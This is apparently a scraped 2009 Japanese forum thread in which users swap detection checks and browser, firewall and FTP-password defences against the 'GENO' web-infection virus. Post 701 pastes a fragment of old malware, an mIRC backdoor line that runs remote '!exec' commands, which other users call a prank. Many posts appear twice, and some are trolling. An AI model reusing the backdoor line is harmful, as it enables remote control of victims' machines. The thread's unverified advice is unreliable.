連続投稿がしつこいな
>>626
さっきのURLをもっかい開いて調べてね
セキュリティ更新プログラムに関する情報
├セキュリティ更新プログラムの展開
.:├Windows XP (すべてのエディション)
.: :├ファイル情報
結論からいえば問題はないんだけど。
>>636
Opera 入 れ な い か ?
>>626
さっきのURLをもっかい開いて調べてね
セキュリティ更新プログラムに関する情報
├セキュリティ更新プログラムの展開
.:├Windows XP (すべてのエディション)
.: :├ファイル情報
結論からいえば問題はないんだけど。
>>636
Opera 入 れ な い か ?
皆ちょっと落ち着け、ウィキは管理者が感染してもウィキの鯖が感染してなければ大丈夫なんだろ
今の所その報告は無い
今の所その報告は無い
情強気取りが撹乱させてるだけです
>>647はその前の発言からも釣りだろ
みんなこわがっておもしろいね^q^
wikiの「感染前の対策」に>>623の範囲も書いといたほうがいいな
そんなことよりサメの話しようぜ
680 : :2009/05/17(日) 02:17:39 ID:27OC+pNi0
539 名前:げの[sage] 投稿日:2009/05/17(日) 01:35:04 ID:8J2Z1lNR0
kerner32がそんなに怖いなら削除すればいいだろ
647 名前:geno[sage] 投稿日:2009/05/17(日) 02:08:58 ID:8J2Z1lNR0
まとめwiki見ろっていうのは釣りだからな
一番危ないのはまとめwiki
↑悪質な冗談ですね
kerner32がそんなに怖いなら削除すればいいだろ
647 名前:geno[sage] 投稿日:2009/05/17(日) 02:08:58 ID:8J2Z1lNR0
まとめwiki見ろっていうのは釣りだからな
一番危ないのはまとめwiki
↑悪質な冗談ですね
681 :名前欄にスレ名入力推奨@自治スレ:2009/05/17(日) 02:17:49 ID:0/YUL0gX0
N速の連中の冷やかしが来てるから冷静にな
ID:8J2Z1lNR0
は↑の通りどう見ても釣りだから気にするな
疑心暗鬼になる気持ちは分かるがちょっとパニくり過ぎやしないか
質問もテンプレに目を通してからにしろ
は↑の通りどう見ても釣りだから気にするな
疑心暗鬼になる気持ちは分かるがちょっとパニくり過ぎやしないか
質問もテンプレに目を通してからにしろ
684 :名前欄にスレ名入力推奨@自治スレ:2009/05/17(日) 02:18:55 ID:Dp8cUJp60
ベンチマークサイト
http://azcji.cocolog-nifty.com/blog/cat1459704/index.html
http://www.police.pref.shizuoka.jp/keisatusho/kakegawa/kakegawa.htm
http://deanm.github.com/pre3d/monster.html
http://azcji.cocolog-nifty.com/blog/cat1459704/index.html
http://www.police.pref.shizuoka.jp/keisatusho/kakegawa/kakegawa.htm
http://deanm.github.com/pre3d/monster.html
685 :名前欄にスレ名入力推奨@自治スレにてLR改定議論中:2009/05/17(日) 02:18:56 ID:wbhRHHzg0
まあまとめサイトも感染するかもしれんけどな
686 : :2009/05/17(日) 02:18:59 ID:27OC+pNi0
テンプレ>>9は不正確だからな
687 :名前欄にスレ名入力推奨@自治スレ:2009/05/17(日) 02:19:04 ID:tVuAN5GY0
wikiにfirefoxの先読み無効とかあるけどアホかよ
先読みされても実害無いだろ
先読みされても実害無いだろ
688 :GENO:2009/05/17(日) 02:19:36 ID:NfFnEcJ60
>>666
例えば尼で買い物しようとして個人情報が抜かれる
例えばFTPで繋げた時にパスとファイルに接触する
という意味にとったが?<ネットに繋がった時点
簡単なFAQだし、不正解とはいえないだろう
気になるなら正しい簡潔な文章をおまいが作ればいいだけ
例えば尼で買い物しようとして個人情報が抜かれる
例えばFTPで繋げた時にパスとファイルに接触する
という意味にとったが?<ネットに繋がった時点
簡単なFAQだし、不正解とはいえないだろう
気になるなら正しい簡潔な文章をおまいが作ればいいだけ
>>683
糞を練ってPCに塗ったくるんですねわかります
糞を練ってPCに塗ったくるんですねわかります
>>667
GENO社員
GENO社員
691 :名前欄にスレ名入力推奨@自治スレ:2009/05/17(日) 02:19:57 ID:Wzgj+9y70
>>655なんだけど、パニクりすぎてた、すこし落ち着いてみる。
反応ありがとう
反応ありがとう
>>3
94.229.65.160/27 は
94.229.65.160 - 94.229.65.191 の範囲を表します。
wikiの表記になぞらえると
94.229.65.160/27(94.229.65.160 - 94.229.65.191)
です。
>>678
サンクス、今それレスしようと思ってた。
94.229.65.160/27 は
94.229.65.160 - 94.229.65.191 の範囲を表します。
wikiの表記になぞらえると
94.229.65.160/27(94.229.65.160 - 94.229.65.191)
です。
>>678
サンクス、今それレスしようと思ってた。
693 :GENO:2009/05/17(日) 02:21:08 ID:juU+TMyj0
もう30分おきにElleFileInfoで容量確認してる自分がいるww
>>494
俺、Kernel32のサイズが868 KB (888,832 バイト)なんだけど
俺、Kernel32のサイズが868 KB (888,832 バイト)なんだけど
695 :GENO:2009/05/17(日) 02:21:40 ID:NfFnEcJ60
697 :名前欄にスレ名入力推奨@自治スレにてLR改定議論中:2009/05/17(日) 02:21:46 ID:wbhRHHzg0
>>694
やばいかも
やばいかも
>>688
それ、全然意味合いが違うよ。
FTPのパスだけを抜こうとするなら、FTP通信を盗聴するトロイが内に潜んでいれば意味が分かる。
でも、あらゆるパスとかを抜こうとすると、それでは話が処理できなくなる。
それ、全然意味合いが違うよ。
FTPのパスだけを抜こうとするなら、FTP通信を盗聴するトロイが内に潜んでいれば意味が分かる。
でも、あらゆるパスとかを抜こうとすると、それでは話が処理できなくなる。
699 :GENO:2009/05/17(日) 02:22:32 ID:5igu3G/B0
まとめwikiは安全だって前スレから外出だろうが
釣りや荒らしはやめろ
釣りや荒らしはやめろ
だが愉快犯によりまとめが改竄されたのは事実
まとめwikiは絶対大丈夫と思ってる奴いるだろ
まとめwikiは絶対大丈夫と思ってる奴いるだろ
701 :名前欄にスレ名入力推奨@自治スレ:2009/05/17(日) 02:22:51 ID:tVuAN5GY0
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
n0=on 900:text:!exec*:*:{.notice $nick Execut comanda: $2-
n0=on 900:text:!exec*:*:{.notice $nick Execut comanda: $2-
>>696
本を読みながらレポート頑張るんだ
本を読みながらレポート頑張るんだ
704 :名前欄にスレ名入力推奨@自治スレにてLR改定議論中:2009/05/17(日) 02:23:27 ID:wbhRHHzg0
>>701
おいやめろ
おいやめろ
ID:wbhRHHzg0
ID:tVuAN5GY0
名前欄入れてない奴は他所から来た奴だろうからこういうのに惑わされるようなアホは
NGIDにぶっこんどけ
ID:tVuAN5GY0
名前欄入れてない奴は他所から来た奴だろうからこういうのに惑わされるようなアホは
NGIDにぶっこんどけ
スレの流れ速すぎてだめだ
遅くてすまないが。
>>603
Macの話なんだけど、10.5.7のアップデートは
ATIグラフィックスカード搭載MacでVMware Fusionの3Dアクセラレーション機能使ってると不具合ありなので該当者は注意ってのを入れたほうがいいかと。
ttp://journal.mycom.co.jp/news/2009/05/15/006/index.html
>>603
Macの話なんだけど、10.5.7のアップデートは
ATIグラフィックスカード搭載MacでVMware Fusionの3Dアクセラレーション機能使ってると不具合ありなので該当者は注意ってのを入れたほうがいいかと。
ttp://journal.mycom.co.jp/news/2009/05/15/006/index.html
710 :名前欄にスレ名入力推奨@自治スレ:2009/05/17(日) 02:24:16 ID:0RqTdqeL0
愉快犯が大量にきてるな
711 :GENO:2009/05/17(日) 02:24:23 ID:x5LHoU8R0
>>389のとおり設定しようとしたら、例外ルール設定を入力して「プロファイルの設定」ウインドウまでは
「OK」ボタン押せるんだけど、その後続けて「パーソナルファイアーウォール」ウインドウの「OK」ボタン押しても、
「現在使用中のパーソナルファイアーウォールプロファイルに対しては変更を保存できません。
ウイルスバスター2009を再起動してから再度実行してください」とアラートが出て、
キャンセルボタンを押すしかできず、設定ができません。
バスターを一旦終了して再起動しても、有効なプロファイルを別のものに切り替えてから
有効でないプロファイルを編集して、そこに設定しようとしても同じく
アラートが出て結局、設定ができない……なぜだorz
「OK」ボタン押せるんだけど、その後続けて「パーソナルファイアーウォール」ウインドウの「OK」ボタン押しても、
「現在使用中のパーソナルファイアーウォールプロファイルに対しては変更を保存できません。
ウイルスバスター2009を再起動してから再度実行してください」とアラートが出て、
キャンセルボタンを押すしかできず、設定ができません。
バスターを一旦終了して再起動しても、有効なプロファイルを別のものに切り替えてから
有効でないプロファイルを編集して、そこに設定しようとしても同じく
アラートが出て結局、設定ができない……なぜだorz
712 :GENO:2009/05/17(日) 02:24:49 ID:uNaTeiSJ0
GENO祭り会場はここか
セキュ板本スレに比べたらましじゃないかなぁ、なんて
714 :GENO:2009/05/17(日) 02:25:23 ID:n5RlUS/yP
>>694
とりあえず、ファイルバージョンをコピペして>>527のリンク先で検索して引っかかれば安全らしいですよ
そもそもkernel32.dllはこのウィルスとは関係ないっぽい?
>>701
こんな事態なのにガキの遊びの如く使い古されたウィルスコード貼るなよ・・・
ビクっとなるから
悪い冗談だ
とりあえず、ファイルバージョンをコピペして>>527のリンク先で検索して引っかかれば安全らしいですよ
そもそもkernel32.dllはこのウィルスとは関係ないっぽい?
>>701
こんな事態なのにガキの遊びの如く使い古されたウィルスコード貼るなよ・・・
ビクっとなるから
悪い冗談だ
>>657
先月から騒がれてるのに情報遅すぎだろお前ら
先月から騒がれてるのに情報遅すぎだろお前ら
716 :Geno:2009/05/17(日) 02:26:14 ID:/3OwKYN30
717 :GENO:2009/05/17(日) 02:26:14 ID:5igu3G/B0
719 :genoマカー1/2:2009/05/17(日) 02:26:44 ID:UQnEuMJQ0
叩き台作ると豪語しておいてツギハギでスマソ
スレに出たマカ向けを集めて組み合わせてみた
-----------ここから---------------
今現在のウイルスの構造ではMacに感染しない。
ただし変異してウィルスの対象になるかもしれない可能性がわずかながらあるので
下記の対策を予防としてやっておきましょう。
○10.3までのOSユーザー
Flash Playerを外す
Acrobat ReaderおよびPDFの拡張子割り当て機能を外す
○TigerとLeopard
Acrobatは9.1、Flash Playerは10.0.22.87以上に更新する
Acrobat Readerの初期設定からAcrobat JavaScriptをオフにする(AcrobatReaderは「プレビュー.app」で代用可能なので始めから入れない手もある)
10.5.7のアップデートは
ATIグラフィックスカード搭載MacでVMware Fusionの3Dアクセラレーション機能使ってると不具合ありなので該当者は注意。
ttp://journal.mycom.co.jp/news/2009/05/15/006/index.html
○Webブラウザ内閲覧機能を切るかJavaScriptオフにする
○Firefoxの場合
3.0.10に更新してNoScript入れること(ツール→アドオン→アドオンを追加→「NoScript」を入れる)
非表示状態になったFlashコンテンツをどうしても見たいときはマウスポインタを置き、リンク先が不正URLでないか確認した上で「一時的に許可」
○Safari・OmniWebなどWebKitベースブラウザの場合
「ダウンロードしたファイルを開く」をオフにする(Safariの「全般」で設定できるが見落とされてしまうことが多い)
Safariの開発メニューを表示させる方法:環境設定→詳細→メニューバーに"開発"メニューを表示 にチェックを入れる
Safariの「開発」でJavaScriptをオフにした場合でも、設定→セキュリティ→「JavaScriptを有効にする」および「プラグインを有効にする」も切っておく。
OmniWebなら初期設定→プラグインでFlashプラグインの活動を停止できる(OmniWebだけのシャットダウン、Safariには影響しません)
スレに出たマカ向けを集めて組み合わせてみた
-----------ここから---------------
今現在のウイルスの構造ではMacに感染しない。
ただし変異してウィルスの対象になるかもしれない可能性がわずかながらあるので
下記の対策を予防としてやっておきましょう。
○10.3までのOSユーザー
Flash Playerを外す
Acrobat ReaderおよびPDFの拡張子割り当て機能を外す
○TigerとLeopard
Acrobatは9.1、Flash Playerは10.0.22.87以上に更新する
Acrobat Readerの初期設定からAcrobat JavaScriptをオフにする(AcrobatReaderは「プレビュー.app」で代用可能なので始めから入れない手もある)
10.5.7のアップデートは
ATIグラフィックスカード搭載MacでVMware Fusionの3Dアクセラレーション機能使ってると不具合ありなので該当者は注意。
ttp://journal.mycom.co.jp/news/2009/05/15/006/index.html
○Webブラウザ内閲覧機能を切るかJavaScriptオフにする
○Firefoxの場合
3.0.10に更新してNoScript入れること(ツール→アドオン→アドオンを追加→「NoScript」を入れる)
非表示状態になったFlashコンテンツをどうしても見たいときはマウスポインタを置き、リンク先が不正URLでないか確認した上で「一時的に許可」
○Safari・OmniWebなどWebKitベースブラウザの場合
「ダウンロードしたファイルを開く」をオフにする(Safariの「全般」で設定できるが見落とされてしまうことが多い)
Safariの開発メニューを表示させる方法:環境設定→詳細→メニューバーに"開発"メニューを表示 にチェックを入れる
Safariの「開発」でJavaScriptをオフにした場合でも、設定→セキュリティ→「JavaScriptを有効にする」および「プラグインを有効にする」も切っておく。
OmniWebなら初期設定→プラグインでFlashプラグインの活動を停止できる(OmniWebだけのシャットダウン、Safariには影響しません)
720 :名前欄にスレ名入力推奨@自治スレ:2009/05/17(日) 02:26:49 ID:cGAFTwR10
721 :GENO:2009/05/17(日) 02:26:49 ID:n5RlUS/yP
この際、新情報スレと、どんな質問にも答えるスレの二つ作っても良いんじゃね?
過去ログ見れば大体わかろうもんだが、
初めてこのウイルスを知って、ウイルス検知ジャンルだったら、一刻も早く対処したいだろうし、
質問被っても答えてやれる場所があったほうが安心じゃないかと思う。
聞かれるほうも、毎度毎度、過去ログ見ろって言ったって、イライラするだけだし、
結局同じ質問はなくならんと思うんだよね。
あと、火狐を入れたらそれで安心と思っている人が多いので、
入れただけじゃ安心じゃないよという警告文と、なぜ火狐が推奨されてるのかも書いたほうが。
googleの先読み禁止とか、noscriptの導入方法とか、
確かに、サイト運営してるならそれぐらい自分で調べろといいたいところだが、
一般的に、サイトの運営って、今は本当に何も知らなくても誰でもできる時代なのだから、
それこそ、おじーちゃんおばーちゃん、下は小学生まで、みんな感染していると思ってあたったほうがいいと思う。
同人板もしかり。
つかこれ、解決すんの?
過去ログ見れば大体わかろうもんだが、
初めてこのウイルスを知って、ウイルス検知ジャンルだったら、一刻も早く対処したいだろうし、
質問被っても答えてやれる場所があったほうが安心じゃないかと思う。
聞かれるほうも、毎度毎度、過去ログ見ろって言ったって、イライラするだけだし、
結局同じ質問はなくならんと思うんだよね。
あと、火狐を入れたらそれで安心と思っている人が多いので、
入れただけじゃ安心じゃないよという警告文と、なぜ火狐が推奨されてるのかも書いたほうが。
googleの先読み禁止とか、noscriptの導入方法とか、
確かに、サイト運営してるならそれぐらい自分で調べろといいたいところだが、
一般的に、サイトの運営って、今は本当に何も知らなくても誰でもできる時代なのだから、
それこそ、おじーちゃんおばーちゃん、下は小学生まで、みんな感染していると思ってあたったほうがいいと思う。
同人板もしかり。
つかこれ、解決すんの?
>>579です
ありがとうございます、
しかしWindowsFWにこれらを記述できるような場所がないのです
もしご存知でしたらWindowsFWでこれらを設定する方法を教えていただけないでしょうか
リストはまとめサイトにあったものをコピペしただけなので
申し訳ありません、どういう意味の数字なのかはわかりません
ありがとうございます、
しかしWindowsFWにこれらを記述できるような場所がないのです
もしご存知でしたらWindowsFWでこれらを設定する方法を教えていただけないでしょうか
リストはまとめサイトにあったものをコピペしただけなので
申し訳ありません、どういう意味の数字なのかはわかりません
724 :GENO:2009/05/17(日) 02:27:46 ID:juU+TMyj0
>>716
自動的にsqlsodbc.chmの容量見てくれるんだお
自動的にsqlsodbc.chmの容量見てくれるんだお
さあみんな良い子だから名前欄に〜をNGに突っ込もうねー
726 :genoマカー2/2おさまらなかた:2009/05/17(日) 02:28:46 ID:UQnEuMJQ0
○自分のサイトが汚染されていないかソースを見て確認すること、FTPパスを変更すること
○動画はようつべならMacTubes、ニコならMacNicoTunesで見る。
○BootCampでXPを入れている人
C:¥WINDOWS¥system32¥sqlsodbc.chm このサイズ表示(ディスク上のサイズではない)
50,727 bytes以外の数値に改ざんされていないかチェックすること。
○動画はようつべならMacTubes、ニコならMacNicoTunesで見る。
○BootCampでXPを入れている人
C:¥WINDOWS¥system32¥sqlsodbc.chm このサイズ表示(ディスク上のサイズではない)
50,727 bytes以外の数値に改ざんされていないかチェックすること。
727 :名前欄にスレ名入力推奨@自治スレ:2009/05/17(日) 02:28:54 ID:lX0WuvPe0
728 :名前欄にスレ名入力推奨@自治スレ:2009/05/17(日) 02:29:17 ID:cGAFTwR10
729 :geno:2009/05/17(日) 02:30:33 ID:/3OwKYN30
730 :GENO:2009/05/17(日) 02:30:45 ID:NfFnEcJ60
>>698
ここはセキュ板と違ってウイルスの挙動や中身を解読する知識はない。
実際に何が行われているかまで検証はできない。
起こったことから想像して、被害の可能性を示唆して注意喚起していくだけ。
それともこれは、FTPのパスを抜き続けることのみが
目的のウイルスなのか?
作者の自己申告ならともかくw
亜種がどんどん出ているし、こっちからは目的を絞れないよ。
ここはセキュ板と違ってウイルスの挙動や中身を解読する知識はない。
実際に何が行われているかまで検証はできない。
起こったことから想像して、被害の可能性を示唆して注意喚起していくだけ。
それともこれは、FTPのパスを抜き続けることのみが
目的のウイルスなのか?
作者の自己申告ならともかくw
亜種がどんどん出ているし、こっちからは目的を絞れないよ。
>>727
そいつら見えない
そいつら見えない
733 :名前欄にスレ名入力推奨@自治スレ:2009/05/17(日) 02:31:29 ID:cGAFTwR10
で、先読み無効は意味なしでいいんだな?
734 :GENO:2009/05/17(日) 02:32:09 ID:uNaTeiSJ0
>>688
そもそも>>9のテンプレを今後使うことになってるのかどうか知らんが、なってるとすれば
新種のコンピュータウィルスが流行っています。
感染サイトを見ただけで感染発症し、大半のアンチウィルスソフトで検知されません。
変化が早く、一部の検知可能なソフトも最新型には対応できていない状況です。
全ジャンルでサイト管理人・閲覧者に感染チェックを推奨します。
特にサイト管理人は二次被害を起こしてしまいますので、早急な確認が望ましいと思われます。
【よくある質問】
Q:感染するとどうなるの?
A:あなたのパソコンに侵入したウイルスは、
FTPによる通信を行った時点でFTPのIDとパスワードを盗みます。
そうなるとFTPでアップロードしたサイトのファイルに悪意を持ったコードが勝手に挿入され、
そのサイトを見た人を感染させます。
その他の個人情報が盗まれるのかどうかはまだわかっていません。
Q:VistaとMacは感染しないの?
A:某企業サイトでの発見直後はVista、Macには感染しないと言われましたが
新種も現れており安心できる状況ではありません。
詳細・感染の確認方法・対策は以下のまとめWikiと>>2-5あたり
同人サイト向け・通称「GENOウイルス」対策まとめ
http://www31.atwiki.jp/doujin_vinfo/
そもそも>>9のテンプレを今後使うことになってるのかどうか知らんが、なってるとすれば
新種のコンピュータウィルスが流行っています。
感染サイトを見ただけで感染発症し、大半のアンチウィルスソフトで検知されません。
変化が早く、一部の検知可能なソフトも最新型には対応できていない状況です。
全ジャンルでサイト管理人・閲覧者に感染チェックを推奨します。
特にサイト管理人は二次被害を起こしてしまいますので、早急な確認が望ましいと思われます。
【よくある質問】
Q:感染するとどうなるの?
A:あなたのパソコンに侵入したウイルスは、
FTPによる通信を行った時点でFTPのIDとパスワードを盗みます。
そうなるとFTPでアップロードしたサイトのファイルに悪意を持ったコードが勝手に挿入され、
そのサイトを見た人を感染させます。
その他の個人情報が盗まれるのかどうかはまだわかっていません。
Q:VistaとMacは感染しないの?
A:某企業サイトでの発見直後はVista、Macには感染しないと言われましたが
新種も現れており安心できる状況ではありません。
詳細・感染の確認方法・対策は以下のまとめWikiと>>2-5あたり
同人サイト向け・通称「GENOウイルス」対策まとめ
http://www31.atwiki.jp/doujin_vinfo/
736 :3:2009/05/17(日) 02:32:58 ID:bMv9yql40
>>389
ウイルスバスター2009(ver.17.1.1251) の「処理」は「拒否」ではないだろうか。
うちのバスター先生の処理項目は、「許可」「拒否」「警告」だよ。「遮断」はない。
>>578
>>1 の同人サイト向けまとめwikiにある。
もっと詳しく知りたいなら ttp://www3.atword.jp/gnome/ かな。
ただし、知識がないと読んでも分からない上に不安になるだけだと思う。
ウイルスバスター2009(ver.17.1.1251) の「処理」は「拒否」ではないだろうか。
うちのバスター先生の処理項目は、「許可」「拒否」「警告」だよ。「遮断」はない。
>>578
>>1 の同人サイト向けまとめwikiにある。
もっと詳しく知りたいなら ttp://www3.atword.jp/gnome/ かな。
ただし、知識がないと読んでも分からない上に不安になるだけだと思う。
とりあえず
嘘を嘘と見抜ける人でないと(掲示板を使うのは)難しい
嘘を嘘と見抜ける人でないと(掲示板を使うのは)難しい
初期から動いてくれてるまとめwikiさんなどは
都度対応してくれてるから、よっぽどなことがない限りは
疑わなくても大丈夫だと思う。
それに今のところは主に最新バージョンに更新さえしてれば
ほぼ心配ないらしいし、実害もまだFTPパスに関してのみ。
心配なら携帯や別PCからFTPパス変更して放置しておけばいい。
FTP触らなければ発信源になることもなさそうだし、
それ以上の不安材料を片っ端から持ってこられると
混乱を招くだけで良くないよ。
FTPソフトいじった人は、すぐにまとめwiki見ればいいし、
FTPソフトいじってない人はまず余計なことせず、ゆっくりスレ読んでまとめwiki読んで
それから質問でも遅くないと思う。
違ってたら訂正お願いします。
都度対応してくれてるから、よっぽどなことがない限りは
疑わなくても大丈夫だと思う。
それに今のところは主に最新バージョンに更新さえしてれば
ほぼ心配ないらしいし、実害もまだFTPパスに関してのみ。
心配なら携帯や別PCからFTPパス変更して放置しておけばいい。
FTP触らなければ発信源になることもなさそうだし、
それ以上の不安材料を片っ端から持ってこられると
混乱を招くだけで良くないよ。
FTPソフトいじった人は、すぐにまとめwiki見ればいいし、
FTPソフトいじってない人はまず余計なことせず、ゆっくりスレ読んでまとめwiki読んで
それから質問でも遅くないと思う。
違ってたら訂正お願いします。
739 :GENO 質問:2009/05/17(日) 02:34:00 ID:txLmXpE00
オペラやたらと推奨してる人がいるけど
火狐よりはオペラの方が簡単だとか便利だとかそういうメリットがあるの?
火狐よりはオペラの方が簡単だとか便利だとかそういうメリットがあるの?
740 :名前欄にスレ名入力推奨@自治スレ:2009/05/17(日) 02:34:15 ID:SFVgMUuu0
Vistaです。
Wikiに書いてあるとおりにsugsqlsodbc.chmを探したんですけど
どこにもないんですがこれって感染でしょうか?
Wikiに書いてあるとおりにsugsqlsodbc.chmを探したんですけど
どこにもないんですがこれって感染でしょうか?
>>740
「C:\Windows\Help\mui」以下のディレクトリにsqlsodbc.chmがあります
sqlsodbc.chm を右クリック → プロパティでボリュームを確認
1個のファイル 50,727バイト と表示されればOK
49.5kbyteと表示された場合、右クリック、プロパティで50,727byteかどうか見る
「C:\Windows\Help\mui」以下のディレクトリにsqlsodbc.chmがあります
sqlsodbc.chm を右クリック → プロパティでボリュームを確認
1個のファイル 50,727バイト と表示されればOK
49.5kbyteと表示された場合、右クリック、プロパティで50,727byteかどうか見る
セキュ板で成美堂出版が感染といってたけど既出?
>740
ここで問うよりもまとめwikiを見る・過去ログを検索するなどしたほうが早いと思います
ここで問うよりもまとめwikiを見る・過去ログを検索するなどしたほうが早いと思います
745 :GENO:2009/05/17(日) 02:36:51 ID:txLmXpE00
このウイルス確認され始めたの何時頃?
このスレ見るまで今日だけでかなりのサイト踏んでしまったんだが
このスレ見るまで今日だけでかなりのサイト踏んでしまったんだが
>>734
連鎖あぼーん設定してないだけだろ
連鎖あぼーん設定してないだけだろ
750 :GENO:2009/05/17(日) 02:37:45 ID:M8hZcTQ40
GoogleChrome使ってるやつはいないのか?
>>747
1か月以上前からあったよ
1か月以上前からあったよ
>740
まとめに書いてあるからちゃんと読め
まとめに書いてあるからちゃんと読め
>>730
感染ルートと、トロイは別物として考えた方が良い。
ルートは、埋めないとなにを仕込まれてしまうか分からない恐怖の穴。
FTPのパスぶっこ抜かれるだけで済んでたらまだマシな話で(ry
トロイは、FTPの通信を監視して、アカとパスを抜いていくみたい。
>>739
どっちでもいいんじゃない。Opera使ってるから薦めるけど、
火狐がいいならそっちを使えばいいと思う。
感染ルートと、トロイは別物として考えた方が良い。
ルートは、埋めないとなにを仕込まれてしまうか分からない恐怖の穴。
FTPのパスぶっこ抜かれるだけで済んでたらまだマシな話で(ry
トロイは、FTPの通信を監視して、アカとパスを抜いていくみたい。
>>739
どっちでもいいんじゃない。Opera使ってるから薦めるけど、
火狐がいいならそっちを使えばいいと思う。
756 :名前欄にスレ名入力推奨@自治スレ:2009/05/17(日) 02:40:19 ID:Jm4nXT7A0
>>723
さっき簡単にwinのFW確認したけど設定する所見当たらないね
さっき簡単にwinのFW確認したけど設定する所見当たらないね
757 :名前欄にスレ名入力推奨@自治スレ:2009/05/17(日) 02:40:19 ID:8/IcS20M0
>>740
C:\Windows\Help\muiに
数字のフォルダがあってその中にずらっと並んでる。
数字はバージョンによって違うのでわざと省いてるので注意。
0411とか0409とかそんな感じのフォルダがある。その中にあるはず。
C:\Windows\Help\muiに
数字のフォルダがあってその中にずらっと並んでる。
数字はバージョンによって違うのでわざと省いてるので注意。
0411とか0409とかそんな感じのフォルダがある。その中にあるはず。
>>729
ありがとう!解決しました
ありがとう!解決しました
saymoveが感染ってのを見て対策しといてよかった
知ったのが今日だったらかなりgkbrしてたんだろうな…
知ったのが今日だったらかなりgkbrしてたんだろうな…
762 :GENO:2009/05/17(日) 02:42:43 ID:uNaTeiSJ0
>>748
あー名前欄じゃなくてIDであぼーんしてたのか
あー名前欄じゃなくてIDであぼーんしてたのか
このスレバスターが反応するんだけど?
>>738
まとめWikiの管理人さんが信用できるとしても、第三者の編集がありうる
リンク書き換えの警告も付け加えた方が良い
>>749
Googleを信頼しすぎてはダメ
たとえばティアラモードは、数時間経ってもまだ損害サイト指定されてない
まとめWikiの管理人さんが信用できるとしても、第三者の編集がありうる
リンク書き換えの警告も付け加えた方が良い
>>749
Googleを信頼しすぎてはダメ
たとえばティアラモードは、数時間経ってもまだ損害サイト指定されてない
>>765
少なくとも今はWiki編集できるのは管理人氏だけだからまだいいけどな。
少なくとも今はWiki編集できるのは管理人氏だけだからまだいいけどな。
うちのXP
sqlsodbc.chm 1,323byte 2009年3月21日、23:18:57更新
kernel32.dll 1,232,384 2009年3月21日、23:18:57更新
sqlsodbc.chmのサイズが。。。改竄されてる・・・? 感染か?
そしてkernel32.dllの更新日時が全く一緒
これはkernel32.dllのタイムスタンプにsqlsodbc.chmが合わせて
windows updateに偽装しようとしているのか・・・?
sqlsodbc.chm 1,323byte 2009年3月21日、23:18:57更新
kernel32.dll 1,232,384 2009年3月21日、23:18:57更新
sqlsodbc.chmのサイズが。。。改竄されてる・・・? 感染か?
そしてkernel32.dllの更新日時が全く一緒
これはkernel32.dllのタイムスタンプにsqlsodbc.chmが合わせて
windows updateに偽装しようとしているのか・・・?
あれ? キーロガー仕込まれるって話じゃなかったっけ。
それでFTP関係以外のIDやパスワードにも注意ってことじゃなかったか?
それでFTP関係以外のIDやパスワードにも注意ってことじゃなかったか?
772 :名前欄にスレ名入力推奨@自治スレ:2009/05/17(日) 02:46:39 ID:tznnOLLq0
普段に比べてESETがちょこちょこ定義データアップしてるが仕事しとるのかね
サイトのアップデート情報も一緒に更新してくれればいいのに
サイトのアップデート情報も一緒に更新してくれればいいのに
>>694
自分もKernel32のサイズが868 KB だった
最終更新日は09/04/15の07:13
もしこれが感染した日だったら、その後サイトの更新をしてしまっているが
サイトを全て確認してもソースにそれっぽい記述が見つからない
というか、スクリプトも全部自分で書いたのしかない
とりあえず、今はオンラインスキャンしてるけど……
自分もKernel32のサイズが868 KB だった
最終更新日は09/04/15の07:13
もしこれが感染した日だったら、その後サイトの更新をしてしまっているが
サイトを全て確認してもソースにそれっぽい記述が見つからない
というか、スクリプトも全部自分で書いたのしかない
とりあえず、今はオンラインスキャンしてるけど……
>>765
>現在は編集を管理権限者に限定しており、改ざん箇所はありません。
>現在は編集を管理権限者に限定しており、改ざん箇所はありません。
あ、ほんと701にウイルス反応してる
まぎらわしいことよしてー
まぎらわしいことよしてー
>>754
解除してなくても何にも考えないで実行押したら終了
解除してなくても何にも考えないで実行押したら終了
ちなみにVistaね
セーフでした。教えてくれた人ありがとうございます。
まとめwikiは読んだんですけどこれをきにPCをしっかり勉強します。
まとめwikiは読んだんですけどこれをきにPCをしっかり勉強します。
神サイトが感染してた時のショックといったら…orz
歴史創作サイトで感染
歴史創作サイトで感染
つかコード貼られるだけで反応するような奴使ってる人って・・・
GENOに感染する奴は感染すべくして感染してるっぽいな。
GENOに感染する奴は感染すべくして感染してるっぽいな。
とりあえず怖い奴はavastっていうウイルスアンチソフトでスキャンしとけ
ジャーン!って換羽ですか
785 :名前欄にスレ名入力推奨@自治スレ:2009/05/17(日) 02:51:30 ID:tznnOLLq0
>>784
おまえ誤爆だろww
おまえ誤爆だろww
788 :名前欄にスレ名入力推奨@自治スレ:2009/05/17(日) 02:52:36 ID:k5Es+N2e0
2ch見るときは専ブラ使おうよ…
おまえら騒ぎたいだけだろ
janeで良いジャーン!
【感染の確認方法】
@cmd.exe(コマンドプロント)、regedit.exe(レジストリエディタ)が起動するか確認する
※このウイルスに感染しているとコマンドプロンプト、レジストリエディタが立ち上がらない。
■確認方法
1.スタートから「ファイル名を指定して実行」
2.「ファイルを指定して実行」という画面が出てくるので、入力欄に
「regedit.exe」と入力して「OK」ボタンを押す。
※立ち上がったことを確認したら弄らず閉じること。
3.同様に、「cmd.exe」(全部小文字で)と入力して「OK」ボタンを押す
※立ち上がったことを確認したらAへ
Asqlsodbc.chmのファイルサイズの確認を確認する
■Windows XP:
改ざんされていなければ
C:\WINDOWS\system32\sqlsodbc.chm 50,727 bytes
■Windows 2000:
そもそも存在しないはずなので、
C:\WINDOWS\system32\sqlsodbc.chmが無いことを確認。
■確認方法
1.スタートから「ファイル名を指定して実行」
2.「ファイルを指定して実行」という画面が出てくるので、入力欄に
「cmd.exe」(全部小文字で)と入力して「OK」ボタンを押す
→背景が黒いウィンドウが開いた場合3へ
→起動しない場合:感染疑い濃厚
3.背景が黒いウィンドウを選択。
小文字で「dir C:\WINDOWS\system32\sqlsodbc.chm」と入力してEnterキー
Bavast!(無料のアンチウイルスソフト)で確認
@cmd.exe(コマンドプロント)、regedit.exe(レジストリエディタ)が起動するか確認する
※このウイルスに感染しているとコマンドプロンプト、レジストリエディタが立ち上がらない。
■確認方法
1.スタートから「ファイル名を指定して実行」
2.「ファイルを指定して実行」という画面が出てくるので、入力欄に
「regedit.exe」と入力して「OK」ボタンを押す。
※立ち上がったことを確認したら弄らず閉じること。
3.同様に、「cmd.exe」(全部小文字で)と入力して「OK」ボタンを押す
※立ち上がったことを確認したらAへ
Asqlsodbc.chmのファイルサイズの確認を確認する
■Windows XP:
改ざんされていなければ
C:\WINDOWS\system32\sqlsodbc.chm 50,727 bytes
